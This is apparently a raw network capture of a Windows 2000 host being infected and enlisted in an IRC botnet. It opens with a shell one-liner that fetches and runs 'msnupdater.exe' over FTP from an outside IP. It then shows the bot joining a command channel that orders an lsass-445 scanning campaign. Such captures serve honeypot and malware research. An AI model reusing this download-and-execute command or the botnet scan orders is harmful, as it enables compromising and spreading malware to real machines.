Server: echo open 118.172.242.90 13110 > o&echo user 1 1 >> o &echo get msnupdater.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &msnupdater.exe


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
ATTACKER:	echo open 118.172.242.90 13110 > o&echo user 1 1 >> o &echo get msnupdater.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &msnupdater.exe 
ATTACKER:	220 StnyFtpd 0wns j0 
VICTIM:  	USER 1 
ATTACKER:	331 Password required 
VICTIM:  	PASS 1 
ATTACKER:	230 User logged in. 
VICTIM:  	PORT 192,168,1,197,4 
ATTACKER:	200 PORT command successful. 
ATTACKER:	RETR msnupdater.exe 
ATTACKER:	150 Opening BINARY mode data connection 
ATTACKER:	226 Transfer complete. 
VICTIM:  	QUIT 
ATTACKER:	221 Goodbye happy r00ting. 
VICTIM:  	PASS chikichiki 
VICTIM:  	NICK N00|10|USA|2KSP2|SYSTEM|EAUSER xxf 0 0 :N00|10|USA|2KSP2|SYSTEM|EA 
ATTACKER:	:skathari.oligarxia.com NOTICE AUTH :*** Looking up your hostname... 
ATTACKER:	:skathari.oligarxia.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead 
ATTACKER:	:skathari.oligarxia.com 001 N00|10|USA|2KSP2|SYSTEM|EA :Welcome to the SKATHARI IRC Network N00|10|USA|2KSP2|SYSTEM|EA!xxf@192.168.1.197:skathari.oligarxia.com 002 N00|10|USA|2KSP2|SYSTEM|EA :Your host is skathari.oligarxia.com, running version Unreal3.2.7:skathari.oligarxia.com 003 N00|10|USA|2KSP2|SYSTEM|EA :This server was created Wed Jun 4 2008 at 20:31:46 CEST:skathari.oligarxia.com 004 N00|10|USA|2KSP2|SYSTEM|EA skathari.oligarxia.com Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj:skathari.oligarxia.com 005 N00|10|USA|2KSP2|SYSTEM|EA NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server:skathari.oligarxia.com 005 N00|10|USA|2KSP2|SYSTEM|EA WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=SKATHARI CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server:skathari.oligarxia.com 005 N00|10|USA|2KSP2|SYSTEM|EA CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server:skathari.oligarxia.com 251 N00|10|USA|2KSP2|SYSTEM|EA :There are 45 users and 28 invisible on 1 servers:skathari.oligarxia.com 254 N00|10|USA|2KSP2|SYSTEM|EA 5 :channels formed:skathari.oligarxia.com 255 N00|10|USA|2KSP2|SYSTEM|EA :I have 73 clients and 0 servers:skathari.oliga 
ATTACKER:	rxia.com 265 N00|10|USA|2KSP2|SYSTEM|EA :Current Local Users: 73  Max: 233:skathari.oligarxia.com 266 N00|10|USA|2KSP2|SYSTEM|EA :Current Global Users: 73  Max: 233:skathari.oligarxia.com 422 N00|10|USA|2KSP2|SYSTEM|EA :MOTD File is missing:N00|10|USA|2KSP2|SYSTEM|EA MODE N00|10|USA|2KSP2|SYSTEM|EA :+iwx 
VICTIM:  	USERHOST N00|10|USA|2KSP2|SYSTEM|EA 
ATTACKER:	:skathari.oligarxia.com 302 N00|10|USA|2KSP2|SYSTEM|EA :N00|10|USA|2KSP2|SYSTEM|EA=+xxf@192.168.1.197     
VICTIM:  	MODE N00|10|USA|2KSP2|SYSTEM|EA +xJOIN #vzop haxUSERHOST N00|10|USA|2KSP2|SYSTEM|EAMODE N00|10|USA|2KSP2|SYSTEM|EA +xJOIN #vzop haxUSERHOST N00|10|USA|2KSP2|SYSTEM|EAMODE N00|10|USA|2KSP2|SYSTEM|EA +xJOIN #vzop haxUSERHOST N00|10|USA|2KSP2|SYSTEM|EAMODE N00|10|USA|2KSP2|SYSTEM|EA +xJOIN #vzop hax 
ATTACKER:	:N00|10|USA|2KSP2|SYSTEM|EA!xxf@35AE8D7F.D9483C1C.E92347E7.IP JOIN :#vzop:skathari.oligarxia.com 332 N00|10|USA|2KSP2|SYSTEM|EA #vzop :.find lsass-445 35 5 1000 x.x.x.x:skathari.oligarxia.com 333 N00|10|USA|2KSP2|SYSTEM|EA #vzop scorpions 1216624912:skathari.oligarxia.com 353 N00|10|USA|2KSP2|SYSTEM|EA @ #vzop :N00|10|USA|2KSP2|SYSTEM|EA N00|192|USA|XPSP2|mazen|IE N00|192|USA|XPSP2|Administrato N00|192|SWE|XPSP2|Johan|IK N00|192|DEU|UNSP1|Administrato N00|192|GRC|UNSP1|user|NM N00|587|DEU|XPSP2|Administrato N00|118|THA|XPSP2|Administrato N00|192|USA|UNSP1|hhinde|UY N00|192|USA|XPSP2|Owner|UD N00|192|USA|XPSP2|HP_Administr N02|192|USA|XPSP3|Admin|DG N00|192|USA|UNSP1|Toshiba|NG N04|192|AUS|XPSP2|Steven|SW N10|192|GBR|XPSP2|Compaq_Owner :skathari.oligarxia.com 366 N00|10|USA|2KSP2|SYSTEM|EA #vzop :End of /NAMES list.:skathari.oligarxia.com 302 N00|10|USA|2KSP2|SYSTEM|EA :N00|10|USA|2KSP2|SYSTEM|EA=+xxf@192.168.1.197    :skathari.oligarxia.com 302 N00|10|USA|2KSP2|SYSTEM|EA :N00|10|USA|2KSP2|SYSTEM|EA=+xxf@192.168.1.197     
VICTIM:  	PRIVMSG #vzop :-=|SCAN|=- Random Method started at x.x.x.x :lsass-445 for 1000 minutes 5 delay 35 threads